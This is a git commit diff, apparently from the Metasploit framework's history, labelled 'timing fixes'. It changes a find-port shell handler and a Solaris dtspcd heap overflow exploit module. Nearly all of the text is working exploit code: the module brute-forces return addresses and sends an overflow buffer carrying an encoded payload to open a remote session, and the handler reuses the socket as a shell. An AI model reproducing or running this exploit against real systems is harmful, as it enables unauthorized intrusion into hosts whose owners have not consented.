timing fixes
git-svn-id: file:///home/svn/incoming/trunk@3292 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2bcfd6f0e5
commit
8de634c25f
|
@ -44,10 +44,12 @@ module FindPort
|
|||
# currently only works for shells.
|
||||
#
|
||||
def handler(sock)
|
||||
return if not sock
|
||||
|
||||
_find_prefix(sock)
|
||||
|
||||
# Flush the receive buffer
|
||||
sock.get(1)
|
||||
sock.get_once(-1, 1)
|
||||
|
||||
# If this is a multi-stage payload, then we just need to blindly
|
||||
# transmit the stage and create the session, hoping that it works.
|
||||
|
@ -125,7 +127,7 @@ protected
|
|||
sock.put("\necho #{ebuf}\n")
|
||||
|
||||
# Try to read a response
|
||||
rbuf = sock.get(3)
|
||||
rbuf = sock.get_once
|
||||
|
||||
# If it contains our string, then we rock
|
||||
if (rbuf =~ /#{ebuf}/)
|
||||
|
|
|
@ -62,10 +62,16 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
|
|||
rbase = target['Rets'][1]
|
||||
|
||||
while (rbase < target['Rets'][2]) do
|
||||
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
|
||||
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
|
||||
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
|
||||
rbase += target['Rets'][3]
|
||||
break if session_created?
|
||||
begin
|
||||
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
|
||||
attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
|
||||
break if session_created?
|
||||
|
||||
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
|
||||
rbase += target['Rets'][3]
|
||||
rescue EOFError
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -113,11 +119,15 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
|
|||
buf << "X" * ((0x103e - 8) - buf.length)
|
||||
|
||||
spc_write(spc_register("", buf), 4)
|
||||
sock.get_once(-1)
|
||||
|
||||
handler
|
||||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
$stderr.puts "Error: #{e.to_s} #{e.class.to_s}"
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue